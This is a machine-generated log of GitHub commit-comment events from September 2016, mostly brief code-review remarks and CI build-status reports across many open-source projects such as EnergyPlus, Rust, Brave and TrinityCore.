{"id":"4510756157","type":"CommitCommentEvent","actor":{"login":"kostyfisik"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18886929,"position":null,"line":null,"path":null,"commit_id":"6d70ce1ba60793e392b76da6e5c04bd4a712531e","created_at":"2016-09-02T21:18:37Z","updated_at":"2016-09-02T21:18:37Z","body":"I switched it on and found \"обессмертил себя несколькими\" has a себя without a pos tag - still not marked with a spell check. So these are different rules and it should be switched on..."}},"created_at":"2016-09-02T21:18:37Z"}
{"id":"4510756836","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":18886931,"position":6,"line":45,"path":"_posts/plotly2/2016-06-23-how-to-enter-data.md","commit_id":"054369ab96a2d704c939cb46aa74204fc6b94116","created_at":"2016-09-02T21:18:48Z","updated_at":"2016-09-02T21:18:48Z","body":"could you say when you edit or add to your data\r\n\r\njust to be 100000% clear you can edit or expand it"}},"created_at":"2016-09-02T21:18:48Z"}
{"id":"4510757356","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":18886934,"position":72,"line":2084,"path":"EMF/common/cb_types/00_cb_types.txt","commit_id":"92d4217a6bfd60447cac4b9ae6fcf6df5d9620de","created_at":"2016-09-02T21:18:56Z","updated_at":"2016-09-02T21:18:56Z","body":"So, upon further thought, I think we should give `emf_no_law_penalties` upon all these succession law changes.  There are actually a couple reasons why that makes sense, but the main and sufficient one is that the usurpation has already happened at that point, so the folks that are going to get claims / hate generated aren't actually the right folks here. [The second reason that comes to mind is that we've got a potential gender succession law change too, which might doubly punish folks-- folks that are the wrong folks even without the first point in the case of the gender succession law change (since it happens after the regular succession law change).]"}},"created_at":"2016-09-02T21:18:56Z"}
{"id":"4510757736","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":18886938,"position":null,"line":null,"path":null,"commit_id":"054369ab96a2d704c939cb46aa74204fc6b94116","created_at":"2016-09-02T21:19:02Z","updated_at":"2016-09-02T21:19:02Z","body":"👯 "}},"created_at":"2016-09-02T21:19:02Z"}
{"id":"4510758927","type":"CommitCommentEvent","actor":{"login":"vertigo17"},"repo":{"name":"vertigo17/Cerberus"},"payload":{"comment":{"id":18886940,"position":null,"line":null,"path":null,"commit_id":"210b595922773c2c4a71b330a61d42d23ef99f25","created_at":"2016-09-02T21:19:21Z","updated_at":"2016-09-02T21:19:21Z","body":"Please don't forget to reference every comit to an issue."}},"created_at":"2016-09-02T21:19:21Z"}
{"id":"4510766174","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"crunchyNYC/Stockfish2016"},"payload":{"comment":{"id":18886950,"position":null,"line":null,"path":null,"commit_id":"d6d530757498e4657d11cf86099323b1d372ff75","created_at":"2016-09-02T21:21:14Z","updated_at":"2016-09-02T21:21:14Z","body":"That does not mean that your patch cannot be an improvement, though :-)"}},"created_at":"2016-09-02T21:21:14Z"}
{"id":"4510767050","type":"CommitCommentEvent","actor":{"login":"eliasku"},"repo":{"name":"takuji/intellij-haxe"},"payload":{"comment":{"id":18886951,"position":null,"line":null,"path":null,"commit_id":"51dbca578bc2f189b073df576e7230ccff47f4e8","created_at":"2016-09-02T21:21:26Z","updated_at":"2016-09-02T21:21:26Z","body":"By the way, i've just done 2016.**2.3** support: https://github.com/eliasku/intellij-haxe/releases/tag/v0.10.0-beta Check it out"}},"created_at":"2016-09-02T21:21:26Z"}
{"id":"4510768514","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18886956,"position":null,"line":null,"path":null,"commit_id":"a9514f30aa56490fe49b2010e28a25144050723b","created_at":"2016-09-02T21:21:51Z","updated_at":"2016-09-02T21:21:51Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2365 of 2366 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T21:21:51Z"}
{"id":"4510775631","type":"CommitCommentEvent","actor":{"login":"mikhail-m1"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18886968,"position":77,"line":77,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"8a17f7ab8a09008d4e8bc88c75f1286d3ff6aa63","created_at":"2016-09-02T21:23:39Z","updated_at":"2016-09-02T21:23:39Z","body":"> This doesn't feel right. Isn't path.krate one of the old crate numbers? In that case, I don't think it should ever be related to max_current_crate.\r\nit's just protect from try to get not exist crate_name and  crate_disambiguator, that check was in krate_still_valid/\r\n\r\nlet krates = ... and new_krates is same hashMap?\r\n\r\n>The main thing is that we need to do the map in the other direction.\r\nOK, we have DefIdDirectory from previous run, and try map it paths to actual crates\r\n"}},"created_at":"2016-09-02T21:23:39Z"}
{"id":"4510776295","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18886971,"position":null,"line":null,"path":null,"commit_id":"d62619d2a9812e7e3717cd93f2e2b1076dd2281f","created_at":"2016-09-02T21:23:48Z","updated_at":"2016-09-02T21:23:48Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1758 of 1758 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-02T21:23:48Z"}
{"id":"4510779255","type":"CommitCommentEvent","actor":{"login":"aerispaha"},"repo":{"name":"aerispaha/swmmio"},"payload":{"comment":{"id":18886979,"position":24,"line":312,"path":"swmmio/swmmio.py","commit_id":"ca14020a3dcd30095694528c9fde590a58b30ff5","created_at":"2016-09-02T21:24:33Z","updated_at":"2016-09-02T21:24:33Z","body":"element_type not yet supported."}},"created_at":"2016-09-02T21:24:33Z"}
{"id":"4510780991","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18886983,"position":null,"line":null,"path":null,"commit_id":"ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6","created_at":"2016-09-02T21:25:01Z","updated_at":"2016-09-02T21:25:01Z","body":"AddLoggingToInstaller (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T21:25:01Z"}
{"id":"4510781302","type":"CommitCommentEvent","actor":{"login":"bsclifton"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18886986,"position":null,"line":null,"path":null,"commit_id":"990e7a33853da114cf067dcdbf40180d6d045ee0","created_at":"2016-09-02T21:25:06Z","updated_at":"2016-09-02T21:25:06Z","body":"@bbondy Attach is working great, but I'm having some trouble here w/ launch. At first, it was erroring because I didn't have a session at `~/Application\\ Support/Electron-development/session-store-1`\r\n\r\nIf I copy my session from ~/Application\\ Support/brave, it'll get past that but then choke leaving this in the logs:\r\n```\r\n/Users/clifton/Documents/browser-laptop/node_modules/.bin/electron --debug-brk=5858 app/index.js . -enable-logging --v=0 --enable-dcheck \r\n[1836:0902/142203:ERROR:backend_impl.cc(2026)] Invalid cache (current) size\r\nAn uncaught exception occurred in the main process Uncaught Exception:\r\nError: ENOENT: no such file or directory, open '/Users/clifton/Library/Application Support/Electron/updateLog.log'\r\n    at Error (native)\r\n/Users/clifton/Documents/browser-laptop/node_modules/node-anonize2-relic-emscripten/anonize2.js:18\r\nif(!Module)Module=(typeof Module!==\"undefined\"?Module:null)||{};var moduleOverrides={};for(var key in Module){if(Module.hasOwnProperty(key)){moduleOverrides[key]=Module[key]}}var ENVIRONMENT_IS_WEB=false;var ENVIRONMENT_IS_WORKER=false;var ENVIRONMENT_IS_NODE=false;var ENVIRONMENT_IS_SHELL=false;if(Module[\"ENVIRONMENT\"]){if(Module[\"ENVIRONMENT\"]===\"WEB\"){ENVIRONMENT_IS_WEB=true}else if(Module[\"ENVIRONMENT\"]===\"WORKER\"){ENVIRONMENT_IS_WORKER=true}else if(Module[\"ENVIRONMENT\"]===\"NODE\"){ENVIRONMENT_IS_NODE=true}else if(Module[\"ENVIRONMENT\"]===\"SHELL\"){ENVIRONMENT_IS_SHELL=true}else{throw new Error(\"The provided Module['ENVIRONMENT'] value is not valid. It must be one of: WEB|WORKER|NODE|SHELL.\")}}else{ENVIRONMENT_IS_WEB=typeof window===\"object\";ENVIRONMENT_IS_WORKER=typeof importScripts===\"function\";ENVIRONMENT_IS_NODE=typeof process===\"object\"&&typeof require===\"function\"&&!ENVIRONMENT_IS_WEB&&!ENVIRONMENT_IS_W\r\nError: ENOENT: no such file or directory, open '/Users/clifton/Library/Application Support/Electron/updateLog.log'\r\n    at Error (native)\r\n```"}},"created_at":"2016-09-02T21:25:06Z"}
{"id":"4510781345","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"crunchyNYC/Stockfish2016"},"payload":{"comment":{"id":18886987,"position":null,"line":null,"path":null,"commit_id":"d6d530757498e4657d11cf86099323b1d372ff75","created_at":"2016-09-02T21:25:07Z","updated_at":"2016-09-02T21:25:07Z","body":"You bring up good points. If I need to modify this based on solid understanding of chess, I am in deep trouble... :)"}},"created_at":"2016-09-02T21:25:07Z"}
{"id":"4510781614","type":"CommitCommentEvent","actor":{"login":"ColombianPizza"},"repo":{"name":"ColombianPizza/colombianpizza"},"payload":{"comment":{"id":18886989,"position":null,"line":null,"path":null,"commit_id":"f844b0fe7935ce6bfa2e0b11b8c311ad7a92806a","created_at":"2016-09-02T21:25:11Z","updated_at":"2016-09-02T21:25:11Z","body":"Este archivo fue subido por: Tania Yulieth Puentes Real"}},"created_at":"2016-09-02T21:25:11Z"}
{"id":"4510782444","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18886993,"position":null,"line":null,"path":null,"commit_id":"a9514f30aa56490fe49b2010e28a25144050723b","created_at":"2016-09-02T21:25:23Z","updated_at":"2016-09-02T21:25:23Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T21:25:23Z"}
{"id":"4510785517","type":"CommitCommentEvent","actor":{"login":"vunnamp"},"repo":{"name":"vunnamp/WebApps"},"payload":{"comment":{"id":18887001,"position":1,"line":1,"path":"README.md","commit_id":"53a3f5cf3fe187f20e233633a4364eeb00acba2a","created_at":"2016-09-02T21:26:13Z","updated_at":"2016-09-02T21:26:13Z","body":"This repository is for Web Apps Assignment 1"}},"created_at":"2016-09-02T21:26:13Z"}
{"id":"4510786300","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18887002,"position":45,"line":3001,"path":"src/server/game/AI/SmartScripts/SmartScript.cpp","commit_id":"96f90381e3ed696861354ea4ddf4ac0c495031c5","created_at":"2016-09-02T21:26:24Z","updated_at":"2016-09-02T21:26:24Z","body":"missing break ?"}},"created_at":"2016-09-02T21:26:24Z"}
{"id":"4510790162","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"StephenBonikowsky/wcf"},"payload":{"comment":{"id":18887021,"position":5,"line":7,"path":"Packaging.props","commit_id":"05d8b778d51361a4a618fa23537ef8b4ecd2a42c","created_at":"2016-09-02T21:27:25Z","updated_at":"2016-09-02T21:27:25Z","body":"You don't need these.  They are corefx specific."}},"created_at":"2016-09-02T21:27:25Z"}
{"id":"4510791771","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":18887031,"position":72,"line":2084,"path":"EMF/common/cb_types/00_cb_types.txt","commit_id":"92d4217a6bfd60447cac4b9ae6fcf6df5d9620de","created_at":"2016-09-02T21:27:53Z","updated_at":"2016-09-02T21:27:53Z","body":"[Example outcome: Basically, William's sons really don't need to hate him anymore than they already do let alone get claims upon their dad's title -- incoherent.]"}},"created_at":"2016-09-02T21:27:53Z"}
{"id":"4510792119","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"StephenBonikowsky/wcf"},"payload":{"comment":{"id":18887037,"position":18,"line":23,"path":"Packaging.props","commit_id":"05d8b778d51361a4a618fa23537ef8b4ecd2a42c","created_at":"2016-09-02T21:27:58Z","updated_at":"2016-09-02T21:27:58Z","body":"You should decide if this is the \"right thing\" for WCF to do."}},"created_at":"2016-09-02T21:27:58Z"}
{"id":"4510794243","type":"CommitCommentEvent","actor":{"login":"polluks"},"repo":{"name":"cc65/cc65"},"payload":{"comment":{"id":18887046,"position":null,"line":null,"path":null,"commit_id":"579b89ad98869d13a8f65f9a37e61485243a5c38","created_at":"2016-09-02T21:28:33Z","updated_at":"2016-09-02T21:28:33Z","body":"How about commenting out?\r\n`;CPU_ISET_M740      = $0100`"}},"created_at":"2016-09-02T21:28:33Z"}
{"id":"4510797275","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"crunchyNYC/Stockfish2016"},"payload":{"comment":{"id":18887054,"position":null,"line":null,"path":null,"commit_id":"d6d530757498e4657d11cf86099323b1d372ff75","created_at":"2016-09-02T21:29:20Z","updated_at":"2016-09-02T21:29:20Z","body":"Me too, alas! Maybe someone will help!"}},"created_at":"2016-09-02T21:29:20Z"}
{"id":"4510805384","type":"CommitCommentEvent","actor":{"login":"glennholloway"},"repo":{"name":"cs50/harvard.cs50.debug"},"payload":{"comment":{"id":18887070,"position":null,"line":null,"path":null,"commit_id":"f5dfdb881cf21f7c80853a67fcf0f2747cbd1223","created_at":"2016-09-02T21:31:20Z","updated_at":"2016-09-02T21:31:20Z","body":"@kzidane, here's another way to put the debugger into the state in which it needs a force stop. If I interrupt a normal debug50 session by typing Control-C twice in rapid succession in debug50's terminal, the chances are high that when I run debug50 again, I'll see the dialog warning me that debugging is still in progress and asking whether I want the existing debugging session shut down. Whether I agree or cancel, the next time I try to run debug50, it just hangs.\r\nObviously, we need to find and fix the root cause, but meanwhile, it would be good to be sure that your force-stop option will clean up in such a situation. Could you please try it? (I'm ashamed to admit that I haven't learned to test a plugin yet.)"}},"created_at":"2016-09-02T21:31:20Z"}
{"id":"4510809201","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18887080,"position":null,"line":null,"path":null,"commit_id":"8d12750e7b9d287aa4ffea5aa91d6b745a290654","created_at":"2016-09-02T21:32:23Z","updated_at":"2016-09-02T21:32:23Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.243.8d12750e7b9d287aa4ffea5aa91d6b745a290654](http://build.palaso.org/viewLog.html?buildId=76422&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:36"}},"created_at":"2016-09-02T21:32:23Z"}
{"id":"4510819745","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18887098,"position":null,"line":null,"path":null,"commit_id":"a9514f30aa56490fe49b2010e28a25144050723b","created_at":"2016-09-02T21:35:06Z","updated_at":"2016-09-02T21:35:06Z","body":"ASIHPValidation (shenb) - i386-Windows-7-VisualStudio-12: OK (2331 of 2332 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T21:35:06Z"}
{"id":"4510821955","type":"CommitCommentEvent","actor":{"login":"DespairFactor"},"repo":{"name":"UBERROMS/build"},"payload":{"comment":{"id":18887107,"position":null,"line":null,"path":null,"commit_id":"7545f98cd29cc1102d6b9e98637d0b6432b57b69","created_at":"2016-09-02T21:35:41Z","updated_at":"2016-09-02T21:35:41Z","body":"Thank you, I was gonna remove it myself "}},"created_at":"2016-09-02T21:35:41Z"}
{"id":"4510831034","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18887123,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-02T21:38:05Z","updated_at":"2016-09-02T21:38:05Z","body":"Check out the alt branch of my NTR Launcher. It no longer requires patched dev launcher!\r\n\r\nit works by mode switching out of TWL mode into NTR mode. So the SRL actually boots in DSi mode but switches into NTR mode prior to booting the game/cart. :D"}},"created_at":"2016-09-02T21:38:05Z"}
{"id":"4510833858","type":"CommitCommentEvent","actor":{"login":"TrindadeDeveloper"},"repo":{"name":"TrindadeDeveloper/HellowWord"},"payload":{"comment":{"id":18887137,"position":null,"line":null,"path":null,"commit_id":"901b66de9f2bc3af973d0b02a7d8a135b0131031","created_at":"2016-09-02T21:38:52Z","updated_at":"2016-09-02T21:38:52Z","body":"Este projeto é apenas um teste."}},"created_at":"2016-09-02T21:38:52Z"}
{"id":"4510833928","type":"CommitCommentEvent","actor":{"login":"DirectorX"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18887138,"position":10,"line":14,"path":"srcpkgs/boswars/template","commit_id":"a33395fb0c927287bede6f8b773c678a9e0d81a7","created_at":"2016-09-02T21:38:53Z","updated_at":"2016-09-02T21:38:53Z","body":"is this commit fixes nocross here?"}},"created_at":"2016-09-02T21:38:53Z"}
{"id":"4510838141","type":"CommitCommentEvent","actor":{"login":"MrSaldanha"},"repo":{"name":"MrSaldanha/CCT0314"},"payload":{"comment":{"id":18887148,"position":null,"line":null,"path":null,"commit_id":"b6daad4e5ccda0d34ef2681be37d7017dad8c720","created_at":"2016-09-02T21:40:09Z","updated_at":"2016-09-02T21:40:09Z","body":"Delete"}},"created_at":"2016-09-02T21:40:09Z"}
{"id":"4510840212","type":"CommitCommentEvent","actor":{"login":"hovanegasr"},"repo":{"name":"hovanegasr/Act_01"},"payload":{"comment":{"id":18887153,"position":38,"line":38,"path":"index.html","commit_id":"ab451888c8e5d2c57f1c7ac9461621d26cd3d669","created_at":"2016-09-02T21:40:43Z","updated_at":"2016-09-02T21:40:43Z","body":"Proceso de Actualización desde Pagina https://github.com"}},"created_at":"2016-09-02T21:40:43Z"}
{"id":"4510840234","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18887152,"position":null,"line":null,"path":null,"commit_id":"00004442774cce1e7d8ca337afd99c4e90a3fb48","created_at":"2016-09-02T21:40:43Z","updated_at":"2016-09-02T21:40:43Z","body":"Dev: always use object or clear associative array ;)"}},"created_at":"2016-09-02T21:40:43Z"}
{"id":"4510844253","type":"CommitCommentEvent","actor":{"login":"deruelle"},"repo":{"name":"RestComm/sbc"},"payload":{"comment":{"id":18887167,"position":null,"line":null,"path":null,"commit_id":"70ee5e94a02811fce008bf8e0effe1b9c7b36fb4","created_at":"2016-09-02T21:41:47Z","updated_at":"2016-09-02T21:41:47Z","body":"sounds good @ocarriles "}},"created_at":"2016-09-02T21:41:47Z"}
{"id":"4510847823","type":"CommitCommentEvent","actor":{"login":"hovanegasr"},"repo":{"name":"hovanegasr/Act_01"},"payload":{"comment":{"id":18887179,"position":38,"line":38,"path":"index.html","commit_id":"ab451888c8e5d2c57f1c7ac9461621d26cd3d669","created_at":"2016-09-02T21:42:46Z","updated_at":"2016-09-02T21:42:46Z","body":"update line 38"}},"created_at":"2016-09-02T21:42:46Z"}
{"id":"4510850688","type":"CommitCommentEvent","actor":{"login":"alexander-mead"},"repo":{"name":"cmbant/CAMB"},"payload":{"comment":{"id":18887191,"position":null,"line":null,"path":null,"commit_id":"3018e4b073afb4cd1038e6110417321dbec85d2e","created_at":"2016-09-02T21:43:35Z","updated_at":"2016-09-02T21:43:35Z","body":"Hi Antony,\r\n\r\nI've been playing with this small updated version you have created. I noticed that one time in every few  the sigma(R) integration gets stuck on the lowest 'R' value. But, strangely, it seems run dependent. I can run with the same params.ini file and it will work 4/5 times and then get stuck on the 5th. I'm investigating this now and will hopefully get this fixed asap. At the moment I'm just making you aware of this. Let me know if you have any bright ideas about what could be causing it. I can only suppose it's to do with the open-mp tags you introduced, but I don't have much experience working with these so I'm not sure.\r\n\r\nCheers,\r\nAlex"}},"created_at":"2016-09-02T21:43:35Z"}
{"id":"4510853324","type":"CommitCommentEvent","actor":{"login":"greg-king5"},"repo":{"name":"cc65/cc65"},"payload":{"comment":{"id":18887195,"position":null,"line":null,"path":null,"commit_id":"579b89ad98869d13a8f65f9a37e61485243a5c38","created_at":"2016-09-02T21:44:20Z","updated_at":"2016-09-02T21:44:20Z","body":"> How about commenting out?\r\n> `;CPU_ISET_M740 = $0100`\r\n\r\nOK."}},"created_at":"2016-09-02T21:44:20Z"}
{"id":"4510855280","type":"CommitCommentEvent","actor":{"login":"ornicar"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":18887200,"position":4,"line":89,"path":"modules/common/src/main/Steroids.scala","commit_id":"5c24d763c6d0fc0a08bfd6564fb0073e6466bec2","created_at":"2016-09-02T21:44:53Z","updated_at":"2016-09-02T21:44:53Z","body":"iirc I tried but it didn't compile because of `implicit`"}},"created_at":"2016-09-02T21:44:53Z"}
{"id":"4510856518","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":18887204,"position":37,"line":73,"path":"js/RateCurve.js","commit_id":"c3d5f1dd56aeb9acff13b3aee449ea6b2d24df93","created_at":"2016-09-02T21:45:13Z","updated_at":"2016-09-02T21:45:13Z","body":"@mikeller  The gui doesnt update when changing rc expo from high numbers back to zero"}},"created_at":"2016-09-02T21:45:13Z"}
{"id":"4510857233","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":18887207,"position":39,"line":75,"path":"js/RateCurve.js","commit_id":"c3d5f1dd56aeb9acff13b3aee449ea6b2d24df93","created_at":"2016-09-02T21:45:24Z","updated_at":"2016-09-02T21:45:24Z","body":"Add a power function here"}},"created_at":"2016-09-02T21:45:24Z"}
{"id":"4510859122","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":18887212,"position":47,"line":82,"path":"js/RateCurve.js","commit_id":"c3d5f1dd56aeb9acff13b3aee449ea6b2d24df93","created_at":"2016-09-02T21:45:55Z","updated_at":"2016-09-02T21:45:55Z","body":"200deg/sec is new 1.0 rc rate. for old version it should use 205.9"}},"created_at":"2016-09-02T21:45:55Z"}
{"id":"4510859131","type":"CommitCommentEvent","actor":{"login":"cycomachead"},"repo":{"name":"cs10/resources"},"payload":{"comment":{"id":18887213,"position":null,"line":null,"path":null,"commit_id":"704091fbe7506129179220f07db571096dc6cde4","created_at":"2016-09-02T21:45:55Z","updated_at":"2016-09-02T21:45:55Z","body":"@AK3331 I think this is fine, they are also linked from the BTB site. :)"}},"created_at":"2016-09-02T21:45:55Z"}
{"id":"4510861284","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":18887217,"position":51,"line":85,"path":"js/RateCurve.js","commit_id":"c3d5f1dd56aeb9acff13b3aee449ea6b2d24df93","created_at":"2016-09-02T21:46:31Z","updated_at":"2016-09-02T21:46:31Z","body":"Might get cleaner here, but this was a quick fix to safely get it to work now."}},"created_at":"2016-09-02T21:46:31Z"}
{"id":"4510862468","type":"CommitCommentEvent","actor":{"login":"carlosbalamba"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":18887222,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-02T21:46:50Z","updated_at":"2016-09-02T21:46:50Z","body":"Aqui se ilustra el resultado de prueba caja negra\r\n[informe prueba caja negra.docx](https://github.com/carlosbalamba/MIKEBOL/files/452964/informe.prueba.caja.negra.docx)\r\n"}},"created_at":"2016-09-02T21:46:50Z"}
{"id":"4510870426","type":"CommitCommentEvent","actor":{"login":"weltling"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18887243,"position":2,"line":210,"path":"ext/standard/image.c","commit_id":"44e43a4738a45797457d6fe740bf33148a5e34c1","created_at":"2016-09-02T21:48:52Z","updated_at":"2016-09-02T21:48:52Z","body":"Indeed :)"}},"created_at":"2016-09-02T21:48:52Z"}
{"id":"4510872772","type":"CommitCommentEvent","actor":{"login":"StephenBonikowsky"},"repo":{"name":"StephenBonikowsky/wcf"},"payload":{"comment":{"id":18887252,"position":18,"line":23,"path":"Packaging.props","commit_id":"05d8b778d51361a4a618fa23537ef8b4ecd2a42c","created_at":"2016-09-02T21:49:31Z","updated_at":"2016-09-02T21:49:31Z","body":"This is where you move all CoreFx packages to the new 4.3.0 version correct?\r\n@zhenlan and I just discussed this today, whether we are expected to move to this as well or not."}},"created_at":"2016-09-02T21:49:31Z"}
{"id":"4510879816","type":"CommitCommentEvent","actor":{"login":"victorfei"},"repo":{"name":"dkmiller/Crack-Coding-Interview"},"payload":{"comment":{"id":18887261,"position":null,"line":null,"path":null,"commit_id":"ea4ab0f5afc198fee15d48df47355ddefff1d586","created_at":"2016-09-02T21:51:24Z","updated_at":"2016-09-02T21:51:24Z","body":"does this even run? have fun coding"}},"created_at":"2016-09-02T21:51:24Z"}
{"id":"4510883168","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18887273,"position":45,"line":3001,"path":"src/server/game/AI/SmartScripts/SmartScript.cpp","commit_id":"96f90381e3ed696861354ea4ddf4ac0c495031c5","created_at":"2016-09-02T21:52:21Z","updated_at":"2016-09-02T21:52:21Z","body":"Woops, yes. a4623ef"}},"created_at":"2016-09-02T21:52:21Z"}
{"id":"4510889494","type":"CommitCommentEvent","actor":{"login":"redbaron"},"repo":{"name":"drawks/go-carbon"},"payload":{"comment":{"id":18887284,"position":4,"line":288,"path":"cache/carbonlink.go","commit_id":"cc18aee8693ec2d97a230dba6a1f418620176d07","created_at":"2016-09-02T21:54:13Z","updated_at":"2016-09-02T21:54:13Z","body":"that is not how strings are encoded\r\nMaybe use stalecucumber for everything but fast path? "}},"created_at":"2016-09-02T21:54:13Z"}
{"id":"4510889881","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18887286,"position":null,"line":null,"path":null,"commit_id":"ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6","created_at":"2016-09-02T21:54:19Z","updated_at":"2016-09-02T21:54:19Z","body":"AddLoggingToInstaller (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage 